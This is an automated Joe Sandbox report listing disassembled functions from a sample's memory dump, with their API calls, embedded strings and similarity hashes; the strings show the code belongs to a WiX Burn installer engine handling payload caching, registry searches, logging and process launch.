Function 0009BB30 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 189processCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0009BB82
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 0009BC8F
GetLastError.KERNEL32(?,?,?,?), ref: 0009BC99
WaitForInputIdle.USER32(?,?), ref: 0009BCED
CloseHandle.KERNEL32(?,?,?), ref: 0009BD38
CloseHandle.KERNEL32(?,?,?), ref: 0009BD45

Strings

Failed to create obfuscated executable command., xrefs: 0009BC2D
Failed to format argument string., xrefs: 0009BB8D
Failed to create executable command., xrefs: 0009BBBC
"%ls", xrefs: 0009BBFF, 0009BC19
approvedexe.cpp, xrefs: 0009BCBD
D, xrefs: 0009BC6E
Failed to CreateProcess on path: %ls, xrefs: 0009BCCA
"%ls" %s, xrefs: 0009BBA8, 0009BBE9
Failed to format obfuscated argument string., xrefs: 0009BBD9

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$approvedexe.cpp
API String ID: 155678114-2737401750
Opcode ID: 0cb5661ef26af95c027c913e9d5db4e9d39dc5912d684678993a2a901ba2cbb8
Instruction ID: 565d8645529e471206d5110307384339af329eb97eee6f56b79fdf68a7d23b69
Opcode Fuzzy Hash: 0cb5661ef26af95c027c913e9d5db4e9d39dc5912d684678993a2a901ba2cbb8
Instruction Fuzzy Hash: 62519B72D0061ABBDF11AFE4DD429EEBBB9FF04310F004166FA04B6261D7719E50ABA1

Function 0009B106 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 136COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,0009B9F7,00000008,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0009B10E
GetLastError.KERNEL32(?,0009B9F7,00000008,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0009B11A
_memcmp.LIBVCRUNTIME ref: 0009B1C2

Strings

Failed to get module handle to process., xrefs: 0009B148
Failed to read section info, unsupported version: %08x, xrefs: 0009B25C
Failed to find valid NT image header in buffer., xrefs: 0009B1A6
Bundle guid didn't match the guid in the PE Header in memory., xrefs: 0009B299
Failed to find valid DOS image header in buffer., xrefs: 0009B17B
.wixburn, xrefs: 0009B1BC
.wix, xrefs: 0009B1E1
Failed to find Burn section., xrefs: 0009B230
Failed to read section info, data to short: %u, xrefs: 0009B212
section.cpp, xrefs: 0009B13E, 0009B16F, 0009B19A, 0009B203, 0009B224, 0009B24D, 0009B28D
burn, xrefs: 0009B1E9

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorHandleLastModule_memcmp
String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
API String ID: 3888311042-926796631
Opcode ID: daa4a6bfeb5658875fb29d4ced13007dd2a7677f7b79ff33822125731b77d851
Instruction ID: fbd6a66927f9ca73e8ad9a3b8bb9f0d7e7f8f06cd0c2ad6e5eb733fae8a3dd77
Opcode Fuzzy Hash: daa4a6bfeb5658875fb29d4ced13007dd2a7677f7b79ff33822125731b77d851
Instruction Fuzzy Hash: 88411772384311B7DF306651ED82F6A7696EF80B30F25402BFA065F6C2DB64C901A7B6

Function 000A2DDC Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 303COMMON

Download Yara Rule

Strings

Failed to copy ancestors and self to related bundle ancestors., xrefs: 000A2EF6
feclient.dll, xrefs: 000A30BB
crypt32.dll, xrefs: 000A2E0E
Failed to create string array from ancestors., xrefs: 000A2E1A
Failed to create dictionary from ancestors array., xrefs: 000A2E46
plan.cpp, xrefs: 000A311D
%ls;%ls, xrefs: 000A2EDE
Unexpected relation type encountered during plan: %d, xrefs: 000A30FE
Failed to lookup the bundle ID in the ancestors dictionary., xrefs: 000A30F0
Failed to add the package provider key "%ls" to the planned list., xrefs: 000A3107
UX aborted plan related bundle., xrefs: 000A3127
Failed to copy self to related bundle ancestors., xrefs: 000A312E

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID:
String ID: %ls;%ls$Failed to add the package provider key "%ls" to the planned list.$Failed to copy ancestors and self to related bundle ancestors.$Failed to copy self to related bundle ancestors.$Failed to create dictionary from ancestors array.$Failed to create string array from ancestors.$Failed to lookup the bundle ID in the ancestors dictionary.$UX aborted plan related bundle.$Unexpected relation type encountered during plan: %d$crypt32.dll$feclient.dll$plan.cpp
API String ID: 0-794096528
Opcode ID: 9448dabde683e2de01c3620e4f4569c3379057237df8e37cdcba13478f667c41
Instruction ID: 02820b3b9df7299269e0648c953da85d24203153846c978096c5f4fdd5e66973
Opcode Fuzzy Hash: 9448dabde683e2de01c3620e4f4569c3379057237df8e37cdcba13478f667c41
Instruction Fuzzy Hash: 6FB1AB71900616EFCB65DFA8CC41EAEBBB5FF06310F10457AF904AB251D731AA91CBA0

Function 0009A17D Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 138registryCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0009A1A8
_MREFOpen@16.MSPDB140-MSVCRT ref: 0009A204
RegQueryValueExW.ADVAPI32(000002C0,00000000,00000000,000002C0,00000000,00000000,000002C0,?,00000000,00000000,?,00000000,00000101,000002C0,000002C0,?), ref: 0009A226
RegCloseKey.ADVAPI32(00000000,00000000,00000000,000002C0,00000100,00000000,000002C0), ref: 0009A300

Strings

Failed to open registry key. Key = '%ls', xrefs: 0009A2C2
Registry key not found. Key = '%ls', xrefs: 0009A291
Failed to query registry key value., xrefs: 0009A265
RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 0009A2D8
Failed to format value string., xrefs: 0009A20F
Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0009A275
Failed to format key string., xrefs: 0009A1B3
Failed to set variable., xrefs: 0009A2B8
search.cpp, xrefs: 0009A25B

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Open@16$CloseQueryValue
String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
API String ID: 2702208347-46557908
Opcode ID: 5460683f27acd76a1cf03b58dd2084e53ca7d3017fb8702e90eb629b5ead7b38
Instruction ID: 102c4ad8dc3ae556d1ca1a74f0feba7cfb88a1bc41aed405c645ee7203b49d13
Opcode Fuzzy Hash: 5460683f27acd76a1cf03b58dd2084e53ca7d3017fb8702e90eb629b5ead7b38
Instruction Fuzzy Hash: 87419772E40314BBDF216F99CD06FEDBB65EF05710F114166FD08A9292D7728E10A6E2

Function 000967E5 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 131libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 00096835
GetLastError.KERNEL32 ref: 0009683F
GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 00096882
GetLastError.KERNEL32 ref: 0009688C
FreeLibrary.KERNEL32(00000000,00000000,?), ref: 0009699D

Strings

Failed to locate RtlGetVersion., xrefs: 000968BA
Failed to locate NTDLL., xrefs: 0009686D
RtlGetVersion, xrefs: 00096877
variable.cpp, xrefs: 00096863, 000968B0
Failed to get OS info., xrefs: 000968DD
ntdll, xrefs: 0009682F
Failed to set variant value., xrefs: 00096981

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
API String ID: 3057421322-109962352
Opcode ID: 3482b12634ad2c02f84fa31d9a3136954acc7860af493dc9ec845cc3eb5265f9
Instruction ID: 52556440ea71d408d6245a96e912bbd140c36fa6fe21b28e1bb53f3dbb8379eb
Opcode Fuzzy Hash: 3482b12634ad2c02f84fa31d9a3136954acc7860af493dc9ec845cc3eb5265f9
Instruction Fuzzy Hash: 0541A471A013399BEF319B65CD05BEAB7E8AB08750F01019AFD48F6291D7358E50DAA4

Function 000947E9 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 128memorysynchronizationCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,0009535E,?,?,?,?), ref: 0009481A
GetLastError.KERNEL32(?,?,?,0009535E,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0009482B
ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00094968
CloseHandle.KERNEL32(?,?,?,?,0009535E,?,?,?,?,?,?,?,?,?,?,?), ref: 00094971

Strings

Failed to create the message window., xrefs: 000948C6
Failed to set elevated pipe into thread local storage for logging., xrefs: 000948A2
engine.cpp, xrefs: 0009484F, 00094898
comres.dll, xrefs: 000948D7
Failed to allocate thread local storage for logging., xrefs: 00094859
Failed to connect to unelevated process., xrefs: 00094810
Failed to pump messages from parent process., xrefs: 0009493C

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AllocCloseErrorHandleLastMutexRelease
String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$engine.cpp
API String ID: 687263955-1790235126
Opcode ID: a96f6581fd7369ef71202966673aa7f3b3dda8ea7f70546387dc60350c3bc00e
Instruction ID: 271f94dcdbba917fe603220337370b02cbc886e6174673b467025e73e9e29925
Opcode Fuzzy Hash: a96f6581fd7369ef71202966673aa7f3b3dda8ea7f70546387dc60350c3bc00e
Instruction Fuzzy Hash: A4416F72A00715FADF119BA5CC85EEBB7ACBF04710F010227FA19E6151DB64A95196F0

Function 000A39FD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 128COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 000A3A51
GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 000A3A5B
GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 000A3AC4
ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 000A3ACB

Strings

Failed to format session id as a string., xrefs: 000A3AF9
Failed to get temp folder., xrefs: 000A3A89
Failed to get length of session id string., xrefs: 000A3B1D
crypt32.dll, xrefs: 000A3A10
Failed to get length of temp folder., xrefs: 000A3AB5
Failed to copy temp folder., xrefs: 000A3B7A
logging.cpp, xrefs: 000A3A7F
%u\, xrefs: 000A3AE5

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Process$CurrentErrorLastPathSessionTemp
String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
API String ID: 1726527325-3274134579
Opcode ID: c248bfdba4d86e582a70e058f34bd21ba5f73220b22c7488b5c80bf7060c9e22
Instruction ID: bb94a3b343d2ba93b17abd883a400a5ef04eb86426ae36944a951545c1670028
Opcode Fuzzy Hash: c248bfdba4d86e582a70e058f34bd21ba5f73220b22c7488b5c80bf7060c9e22
Instruction Fuzzy Hash: 24419576D8123DABDB209B649C4AFDAB7B8EB15710F110196FD08B7241D7749F808BE4

Function 00097E7C Relevance: 21.2, APIs: 2, Strings: 12, Instructions: 214COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000), ref: 00097E99
LeaveCriticalSection.KERNEL32(?,?,?), ref: 000980C1

Strings

Failed to write variable value type., xrefs: 000980A1
feclient.dll, xrefs: 00097F74, 00097FCA, 0009800B
Failed to write variable name., xrefs: 000980A8
Failed to get version., xrefs: 00098072
Failed to write variable value as number., xrefs: 0009806B
Failed to write variable value as string., xrefs: 00098085
Failed to write literal flag., xrefs: 0009809A
Failed to write included flag., xrefs: 000980AF
Unsupported variable type., xrefs: 0009807E
Failed to get numeric., xrefs: 00098093
Failed to get string., xrefs: 0009808C
Failed to write variable count., xrefs: 00097EB4

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
API String ID: 3168844106-2118673349
Opcode ID: 1d3b838d2fc694b8c4bfeebde194aff7cc5f11e4c6a30137a9becfa450a6c771
Instruction ID: 3a470d917fcd522467d64ce9d30c4f4ddd25b4a679af66891338c8d9601677c8
Opcode Fuzzy Hash: 1d3b838d2fc694b8c4bfeebde194aff7cc5f11e4c6a30137a9becfa450a6c771
Instruction Fuzzy Hash: 0A61C63280461AEBCFA29F64CD41BEE7BA5BF45350F108266FA0067351CB31DD58EBA1

Function 000D6BF6 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 166COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,74DEDFD0,?,000D7172,?,?), ref: 000D6C4C
SysFreeString.OLEAUT32(00000000), ref: 000D6CB7
SysFreeString.OLEAUT32(00000000), ref: 000D6D2F
SysFreeString.OLEAUT32(00000000), ref: 000D6D71

Strings

scheme, xrefs: 000D6C5F
feclient.dll, xrefs: 000D6C9E, 000D6D42, 000D6D51
rq, xrefs: 000D6C34, 000D6C5A, 000D6D17
rq, xrefs: 000D6D84, 000D6CF0, 000D6D06, 000D6CF3, 000D6D8D
term, xrefs: 000D6C7F
label, xrefs: 000D6C3E

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: String$Free$Compare
String ID: feclient.dll$label$rq$rq$scheme$term
API String ID: 1324494773-3146520643
Opcode ID: db143d99c151236aade5e7b10f6b71e9fd5a371888dc411d072cb44dc6301406
Instruction ID: 6660a18a3edd78a1c6436335a1aea75a22897bd0456d5bf58a8b09541e457cf4
Opcode Fuzzy Hash: db143d99c151236aade5e7b10f6b71e9fd5a371888dc411d072cb44dc6301406
Instruction Fuzzy Hash: 30515075E01319FBDB21CB94CC45FAEBBB9EF04711F214296E511AB2A0D7329E40DB60

Function 000A95AC Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 122fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000,?,00000000,?,000AA63D,?,00000000,?,?,000BB049), ref: 000A95C7
GetLastError.KERNEL32(?,000AA63D,?,00000000,?,?,000BB049,?,00000000,?,00000000,?,?,000BB049,?), ref: 000A95D7
CloseHandle.KERNEL32(?,000BB049,00000001,00000003,000007D0,?,?,000BB049,?), ref: 000A96E4

Strings

Failed to copy %ls to %ls, xrefs: 000A96D2
Failed to move %ls to %ls, xrefs: 000A96BC
Copying, xrefs: 000A9679
Moving, xrefs: 000A9686, 000A968E
Failed to open payload in working path: %ls, xrefs: 000A9606
%ls payload from working path '%ls' to path '%ls', xrefs: 000A968F
cache.cpp, xrefs: 000A95FB
Failed to verify payload signature: %ls, xrefs: 000A9632
Failed to verify payload hash: %ls, xrefs: 000A966F

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
API String ID: 2528220319-1604654059
Opcode ID: d2b5318bbc4bc61bb2b43ef11fc6fe8a2d65033b8dbf97e7a6ad3b0658a2fceb
Instruction ID: ef2e0adcfa4e13aa3cc10a47ada596239268a876bc5c5e8ba709f43a38345df9
Opcode Fuzzy Hash: d2b5318bbc4bc61bb2b43ef11fc6fe8a2d65033b8dbf97e7a6ad3b0658a2fceb
Instruction Fuzzy Hash: F931D471F40764BFEB312AA68C06FAF3A5CDF42B50F01015AFE09BB292D6619D0086F5

Function 000B1341 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 80synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(000DB468,=S,00000000,?,0009C06D,=S,000952B5,00000000,?,000A763B,?,00095565,00095371,00095371,00000000,?), ref: 000B135E
GetLastError.KERNEL32(?,0009C06D,=S,000952B5,00000000,?,000A763B,?,00095565,00095371,00095371,00000000,?,00095381,FFF9E89D,00095381), ref: 000B1368
WaitForSingleObject.KERNEL32(000DB478,000000FF,?,0009C06D,=S,000952B5,00000000,?,000A763B,?,00095565,00095371,00095371,00000000,?,00095381), ref: 000B13A2
GetLastError.KERNEL32(?,0009C06D,=S,000952B5,00000000,?,000A763B,?,00095565,00095371,00095371,00000000,?,00095381,FFF9E89D,00095381), ref: 000B13AC
CloseHandle.KERNEL32(00000000,00095381,=S,00000000,?,0009C06D,=S,000952B5,00000000,?,000A763B,?,00095565,00095371,00095371,00000000), ref: 000B13F7
CloseHandle.KERNEL32(00000000,00095381,=S,00000000,?,0009C06D,=S,000952B5,00000000,?,000A763B,?,00095565,00095371,00095371,00000000), ref: 000B1406
CloseHandle.KERNEL32(00000000,00095381,=S,00000000,?,0009C06D,=S,000952B5,00000000,?,000A763B,?,00095565,00095371,00095371,00000000), ref: 000B1415

Strings

Failed to set begin operation event., xrefs: 000B1396
cabextract.cpp, xrefs: 000B138C, 000B13D0
=S, xrefs: 000B1348
Failed to wait for thread to terminate., xrefs: 000B13DA
=S, xrefs: 000B1345

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseHandle$ErrorLast$EventObjectSingleWait
String ID: =S$=S$Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
API String ID: 1206859064-1651490079
Opcode ID: 1bf8e9a85219a8446fff98166bda30838cea0328a2e1536328ca4e1194bb2ffc
Instruction ID: 76788f07bff9c466d7c4e21a15c84229a5981cd91ce99dee3b3f65303618d307
Opcode Fuzzy Hash: 1bf8e9a85219a8446fff98166bda30838cea0328a2e1536328ca4e1194bb2ffc
Instruction Fuzzy Hash: BB219132200700DBE7315B26DC49BE777F6FF88712F01062EE99A919A0EB79E441DA35

Function 000A3E47 Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 000A3955: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,000A3E61,feclient.dll,?,00000000,?,?,?,00094A0C), ref: 000A39F1

Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00094A0C,?,?,000DB478,?,00000001,00000000,00000000), ref: 000A3EF8

Strings

Failed to copy full log path to prefix., xrefs: 000A405B
Failed to get non-session specific TEMP folder., xrefs: 000A3FA2
msasn1.dll, xrefs: 000A400E, 000A404F
feclient.dll, xrefs: 000A3E5B, 000A3F08
log, xrefs: 000A3E9F
Setup, xrefs: 000A3EA5
crypt32.dll, xrefs: 000A3E9E, 000A3F03, 000A3F0B, 000A3F72, 000A3FAC, 000A3FED, 000A400C, 000A404A, 000A4074
Failed to copy log path to prefix., xrefs: 000A401A
Failed to open log: %ls, xrefs: 000A3F74
Failed to copy log extension to extension., xrefs: 000A403D
clbcatq.dll, xrefs: 000A4031
Failed to get current directory., xrefs: 000A3EDA

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseSleep
String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
API String ID: 2834455192-2673269691
Opcode ID: a9a180ec7ef6d4a00ce41e08cec1c707bf9ed084c609a64c106fcafb6087ab6f
Instruction ID: 6108c8972d5ac311f297ac3b70a2748b8dbaa7db4914728c924bc5785390f66d
Opcode Fuzzy Hash: a9a180ec7ef6d4a00ce41e08cec1c707bf9ed084c609a64c106fcafb6087ab6f
Instruction Fuzzy Hash: FD61C171A00615BFDB61DFB4CC46F6A7AE8EF02340B144166F905DB282E7B1EE9097A1

Function 00096C5D Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 167COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000001,?,00000000,0009533D,00000000,00000001), ref: 00096C6E

Part of subcall function 000955B6: CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,00000007,0009648B,0009648B,?,0009554A,?,?,00000000), ref: 000955F2
Part of subcall function 000955B6: GetLastError.KERNEL32(?,0009554A,?,?,00000000,?,00000000,0009648B,?,00097DDC,?,?,?,?,?), ref: 00095621

LeaveCriticalSection.KERNEL32(00000001,?,00000001), ref: 00096E02

Strings

Attempt to set built-in variable value: %ls, xrefs: 00096CFC
Unsetting variable '%ls', xrefs: 00096DBE
variable.cpp, xrefs: 00096CF1
Setting hidden variable '%ls', xrefs: 00096D2C
Setting string variable '%ls' to value '%ls', xrefs: 00096D96
Failed to insert variable '%ls'., xrefs: 00096CB3
Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00096E14
Setting numeric variable '%ls' to value %lld, xrefs: 00096DA3
Failed to set value of variable: %ls, xrefs: 00096DEA
Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00096D79
Failed to find variable value '%ls'., xrefs: 00096C89

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

